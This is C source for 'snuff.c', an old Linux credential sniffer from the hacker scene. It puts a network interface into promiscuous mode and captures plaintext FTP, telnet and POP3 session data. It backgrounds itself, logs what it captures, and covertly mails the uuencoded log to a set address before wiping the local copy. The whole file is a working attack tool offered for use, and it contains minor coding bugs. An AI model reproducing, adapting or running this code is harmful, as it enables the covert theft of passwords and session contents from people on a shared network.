/*
 * snuff.c v0.8.1, a linux packet sniffer
 * Author: noupe [tm@ns2.crw.se]
 *        http://ns2.crw.se/~tm/
 * WWW: http://c5.hakker.com
 *
 */


/*
 * Feel free to change this
 */

#define SNUFF_CFG "snuff.cfg"	/* Default cfg file.. */
#define MAIL_AS_UID     8	/* Mail the log as this user */
#define MAIL_AS_GID     12	/* ..with this gid */
/* #define TELNET_HACK  	 See README */


/*
 * Here's a sample snuff.cfg file
 *

snifflen:2048
dev:eth0
backgnd:1
timeout:15
ports:21 23 110
log:/var/log/worldreadablesnifflog
keepopen:1
maxpkts:100
wipelog:1
mailaddr:root@localhost
dontmail:0


 * Don't touch stuff below this
 * line unless you're a real hax0r :-)
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>   
#include <netinet/in.h>
#include <arpa/inet.h>  
#include <time.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdarg.h>
#include <signal.h>
#include <ctype.h>
#include <net/if.h>
#include <netinet/ip.h>
#include <linux/tcp.h>
#include <sys/wait.h>
#include <sys/errno.h>


struct PKT_LIST {
	unsigned long saddr;
	unsigned long daddr;
	unsigned int sport;
	unsigned int dport;
	unsigned long dataread;
	time_t start;
	struct PKT_LIST *next;
	char *data;
} *root = NULL;
typedef struct PKT_LIST LIST;
        
        
struct snuff_config {
	int snifflen;
	int backgnd;
	int timeout;
	int maxpkts;
	int dontmail;
	int wipelog;
	int keepopen;
	char *dev;
	char *logfile;
	char *ports;
	char *mailaddr;
};
typedef struct snuff_config SNUFFCFG;


void handle_stuff(void);
SNUFFCFG *snuff_setup(FILE *);
int setpromisc(char *);
char *namelookup(unsigned long);
void suicide(char *);
void signal_handler(int);
void add_pkt(u_long, u_long, u_int, u_int);
LIST *find_pkt(u_long, u_long, u_int, u_int);
void rm_pkt(LIST *); 
void save_pkt(LIST *, int);
unsigned long put_log(char *, ...);
void update_pkt_list(void);
void mail(void);

  
#define PKT_TIMEDOUT    0
#define PKT_EDL         1
#define PKT_RST         2
#define PKT_FIN         3


char rawdata[0xffff];
int eth_desc, totalpkts = 0;
time_t now;
SNUFFCFG *cfg;
FILE *log;


int main()
{
	FILE *cfgfd;

	printf("snuff.c, a linux packet sniffer by noupe [nv98nowi@egy.engelholm.se]\n\n");

	if(getuid())
		suicide("duh, run as root asshole!");

	if(!(cfgfd = fopen(SNUFF_CFG, "rt")))
	{
		if(!(cfgfd = fopen(getenv("SNUFFCFG"), "rt")))
		{
			suicide("No config file found! "
				"Set SNUFFCFG to your cfg file "
				"or make sure snuff.cfg is "
				"in your working dir.");
		}
	}

	cfg = snuff_setup(cfgfd);
	fclose(cfgfd);
	if(cfg->backgnd)
		if(fork())
			exit(0);

	if(!cfg->logfile)
		log = stderr;
	else if(cfg->keepopen && !(log = fopen(cfg->logfile, "at")))
		suicide("Can't open log file");

	signal(SIGHUP, SIG_IGN);
	signal(SIGTERM, signal_handler);
	signal(SIGQUIT, signal_handler);
	signal(SIGINT, signal_handler);
	eth_desc = setpromisc(cfg->dev);
	put_log("[INFO] snuff started!\n");

	memset(rawdata, 0, sizeof(rawdata));

	/* this is our loop */
	while(1)
	{
		if(read(eth_desc, rawdata, sizeof(rawdata)) < 1)
			return 0;
		now = time(NULL);
		handle_stuff();
	}

	return 0;
}


void handle_stuff(void)
{
	char portx[10];
	struct iphdr *ip_h;
	struct tcphdr *tcp_h;
	int iplen, tcplen;
	LIST *pkt;

	ip_h = (struct iphdr *)((char *)rawdata+14);
	if(ip_h->protocol != 6)
		return;

	iplen = ip_h->ihl << 2;
	tcp_h = (struct tcphdr *)((char *)rawdata+14+iplen);
	tcplen = tcp_h->doff << 2;
	sprintf(portx, " %d ", ntohs(tcp_h->dest));
	if(!strstr(cfg->ports, portx))
		return;

	update_pkt_list();
	if(tcp_h->syn == 1)
	{
		add_pkt(ip_h->saddr, ip_h->daddr, tcp_h->source, tcp_h->dest);
		return;
	}

	pkt = find_pkt(ip_h->saddr, ip_h->daddr, tcp_h->source, tcp_h->dest);
	if(!pkt)
		return;

	if(tcp_h->rst == 1)
		save_pkt(pkt, PKT_RST);
	else if(tcp_h->fin == 1)
		save_pkt(pkt, PKT_FIN);
	else
	{
		int len;

		len = htons(ip_h->tot_len) - iplen - tcplen;
		if(pkt->dataread + len > cfg->snifflen)
			len = cfg->snifflen - pkt->dataread;

		memcpy(pkt->data + pkt->dataread, rawdata+14+iplen+tcplen,
			len);

		pkt->dataread += len;
	}

	return;
}


SNUFFCFG *snuff_setup(FILE *conf)
{
	char line[0xff], *p;
	SNUFFCFG *cfg;

	cfg = (SNUFFCFG *)calloc(1, sizeof(SNUFFCFG));
	cfg->snifflen = 0xff;
	cfg->wipelog = 0;
	cfg->keepopen = 1;

	while(!feof(conf))
	{
		if(!(p = fgets(line, 0xff, conf)))
			break;

		for(;*p;p++)
			if(*p < ' ')
				*p = 0;

		if(!strncasecmp("snifflen:", line, 9))
			cfg->snifflen = atoi(strchr(line, ':') + 1);
		else if(!strncasecmp("backgnd:", line, 8))
			cfg->backgnd = atoi(strchr(line, ':') + 1);
		else if(!strncasecmp("timeout:", line, 8))
			cfg->timeout = atoi(strchr(line, ':') + 1);
		else if(!strncasecmp("maxpkts:", line, 8))
			cfg->maxpkts = atoi(strchr(line, ':') + 1);
		else if(!strncasecmp("dev:", line, 4))
			cfg->dev = strdup(strchr(line, ':') + 1);
		else if(!strncasecmp("dontmail:", line, 9))
			cfg->dontmail = atoi(strchr(line, ':') + 1);
		else if(!strncasecmp("mailaddr:", line, 9))
			cfg->mailaddr = strdup(strchr(line, ':') + 1);
		else if(!strncasecmp("wipelog:", line, 8))
			cfg->wipelog = atoi(strchr(line, ':') + 1);
		else if(!strncasecmp("keepopen:", line, 9))
			cfg->keepopen = atoi(strchr(line, ':') + 1);
		else if(!strncasecmp("log:", line, 4))
			cfg->logfile = strdup(strchr(line, ':') + 1);
		else if(!strncasecmp("ports:", line, 6))
		{
			cfg->ports = (char *)calloc(strlen(line), 1);
			*cfg->ports = ' ';
			strcat(cfg->ports, strchr(line, ':') + 1);
			strcat(cfg->ports, " ");
		}
	}

	return cfg;
}


int setpromisc(char *dev)
{

	int desc;
	struct ifreq intf_req;

	if((desc = socket(AF_INET, SOCK_PACKET, htons(0x800))) < 0)
		suicide("Can't set promisc. mode");

	strncpy(intf_req.ifr_name, dev, 16);
	if(ioctl(desc, SIOCGIFFLAGS, &intf_req) < 0)
		suicide("Can't set promisc. mode");

	intf_req.ifr_flags |= IFF_PROMISC;
	if(ioctl(desc, SIOCSIFFLAGS, &intf_req) < 0)
		suicide("Can't set promisc. mode");
	
	return desc;	
}


char *namelookup(unsigned long ip)
{
	static char *x = NULL;
	struct in_addr inaddr;
	struct hostent *he;

	inaddr.s_addr = ip;
	if(!(he = gethostbyaddr((char *)&inaddr, sizeof(struct in_addr), AF_INET)))
	{
		x = (char *)realloc(x, 17);
		strncpy(x, inet_ntoa(inaddr), 17);
	}
	else
	{
		x = (char *)realloc(x, strlen(he->h_name) + 1);
		strcpy(x, he->h_name);
	}

	return x;
}


void suicide(char *s)
{
	printf("<snuff>: %s\nerrno:%s", s, strerror(errno));
	exit(1);	
}


void signal_handler(int signo)
{
	char msg[20];
	switch(signo)
	{
		case SIGTERM:
		sprintf(msg, "\n[INFO] Terminated!\n");
		break;

		case SIGQUIT:
		sprintf(msg, "\n[INFO] Quiting!\n");
		break;

		case SIGINT:
		sprintf(msg, "\n[INFO] Interupted!\n");
		break;
	}

	put_log(msg);
	free(cfg->logfile);
	free(cfg->ports);
	free(cfg);
	close(eth_desc);
	exit(0);
}


void add_pkt(u_long sa, u_long da, u_int sp, u_int dp)
{
	LIST *p = root;

	if(totalpkts == cfg->maxpkts)
		return;

	if(!root)
	{
		if(!(root = (LIST *)calloc(1, sizeof(LIST))))
			return;

		p = root;
	}
	else
	{
		while(p->next)
			p = p->next;

		p->next = (LIST *)calloc(1, sizeof(LIST));
		p = p->next;
	}

	p->saddr = sa;
	p->daddr = da;
	p->sport = sp;
	p->dport = dp;
	p->start = now;
	p->dataread = 0;
	p->next = NULL;
	p->data = (char *)malloc(cfg->snifflen+1);
	memset(p->data, '?', sizeof(p->data));
	totalpkts++;
	return;
}


void rm_pkt(LIST *bad)
{
	LIST *p = root, *tmp = NULL;

	if(!root)
		return;

	while(p)
	{
		if(bad == p)
			break;

		tmp = p;	
		p = p->next;
	}


	if(tmp)
		tmp->next = p->next;
	else
		root = p->next;

	free(p->data);
	free(p);
	totalpkts--;
	return;
}


LIST *find_pkt(u_long sa, u_long da, u_int sp, u_int dp)
{
	LIST *p = root;

	if(!root)
		return NULL;

	while(p)
	{
		if(p->saddr == sa && p->daddr == da &&
		   p->sport == sp && p->dport == dp)
			break;
	
		p = p->next;
	}

	return p;
}


void save_pkt(LIST *save, int x)
{
	LIST *p = root;
	struct tm *t;
	char *s, *d;
	int b, col;
	int telnethack = 0;
	unsigned long fsize;

	if(!root)
		return;

	while(p)
	{
		if(p == save)
			break;
	
		p = p->next;
	}

	if(!p->dataread)
	{
		rm_pkt(p);
		return;
	}

	t = localtime(&p->start);
	put_log("[snuff] [date: %.2d/%.2d/%.2d %.2d:%.2d:%.2d] [status: %s] [time: %ld] [read: %ld]\n",
			t->tm_year%100, t->tm_mon+1, t->tm_mday, t->tm_hour, t->tm_min, t->tm_sec, 
			x? x == 1? "EXCESS DATA LIMIT": x == 2? "RST":
			"FIN": "TIMED OUT", now - p->start, p->dataread);

	s = strdup(namelookup(p->saddr));
	d = strdup(namelookup(p->daddr));
	put_log("[snuff] [src: %s] [dest: %s] [port: %d]\n", s, d, ntohs(p->dport));

	free(s);
	free(d);
	for(b = 0, col = 0;b != p->dataread;b++, col++)
	{
		if(p->data[b] == 1 && ntohs(p->dport) == 23)
			telnethack++;

#ifdef TELNET_HACK
		if(p->data[b] == '\n' || p->data[b] == '\r' || !(col % 79) || telnethack == 2)
#else
		if(p->data[b] == '\n' || p->data[b] == '\r' || !(col % 79))
#endif
		{
			col = 0;
			put_log("\n");
			if(p->data[b + 1] == '\r' || p->data[b + 1] == '\n')
				b++;
		}

		if(isprint(p->data[b]))
			put_log("%c", p->data[b]);
	}

	rm_pkt(p);
	fsize = put_log("\n");
	if(cfg->wipelog && fsize > (cfg->wipelog*1024) && !cfg->dontmail)
		mail();

	return;
}


void update_pkt_list(void)
{
	LIST *p = root;

	if(!p)
		return;

	while(p)
	{
		if((p->start + cfg->timeout) < now)
			save_pkt(p, PKT_TIMEDOUT);
		else if(p->dataread >= cfg->snifflen)
			save_pkt(p, PKT_EDL);
		else
		{
			p = p->next;
			continue;
		}

		p = root;
	}
}


void mail(void)
{
	char buf[0x1ff], *uuelog = NULL, *p;
	int ret;
	size_t len;
	FILE *fd;

	if(!cfg->logfile || !cfg->mailaddr)
		return;

	if(fork() > 0)
	{
		wait(&ret);
		if(!cfg->wipelog)
			return;

		if(cfg->keepopen)
			fclose(log);

		unlink(cfg->logfile);
		if(cfg->keepopen && !(log = fopen(cfg->logfile, "at")))
			suicide("Can't open log file");

		put_log("[info] log wiped!\n");
		return;
	}

	sprintf(buf, "uuencode %s snuff-log", cfg->logfile);
	if((fd = popen(buf, "r")) == NULL)
		exit(0); /* fuck! */
		
	for(len = 0;!feof(fd);)
	{
		if((uuelog = realloc(uuelog, len+1024)) == NULL)
			break;

		p = uuelog + len;
		len += fread(p, 1, 1024, fd);
	}

	pclose(fd);
	setgid(MAIL_AS_GID);
	setuid(MAIL_AS_UID);
	fclose(stderr); /* Heh, just in case something would fail */
	fclose(stdout);
	sprintf(buf, "mail -s snuff %s", cfg->mailaddr);
	if((fd = popen(buf, "w")) == NULL)
		exit(0); /* fuck! */

	fwrite(uuelog, 1, len, fd);
	pclose(fd);
	free(uuelog);
	exit(0);
}


unsigned long put_log(char *fmt, ...)
{
	FILE *q_log = NULL;
	va_list ap;
	unsigned long ret = 0;

	if(!cfg->keepopen && !(q_log = fopen(cfg->logfile, "at")))
			return 0; /* this sucks */

	va_start(ap, fmt);
	vfprintf(cfg->keepopen? log: q_log, fmt, ap);
	va_end(ap);

	fflush(cfg->keepopen? log: q_log);
	ret = ftell(cfg->keepopen? log: q_log);
	if(!cfg->keepopen)
		fclose(q_log);

	return ret;
}
